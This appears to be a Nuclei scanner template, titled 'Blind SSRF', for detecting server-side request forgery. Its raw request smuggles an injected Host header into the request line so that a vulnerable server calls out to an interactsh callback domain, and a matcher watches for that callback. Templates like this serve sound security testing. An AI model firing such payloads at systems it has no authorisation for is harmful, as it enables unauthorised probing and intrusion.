id: 0x091

info:
  name: Blind SSRF
  author: 0xAwali
  severity: low

requests:
  - raw:
    - |+
      GET /%20HTTP/1.10x0D0x0ADHost:%20{{Host}}.{{Port}}.BSSRF-091.{{interactsh-url}}0x0D0x0A0x0D0x0A HTTP/1.1
      Host: {{Hostname}}
      User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
      Cache-Control: no-transform
      Accept-Encoding: gzip, deflate
      Accept: */*

    unsafe: true
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"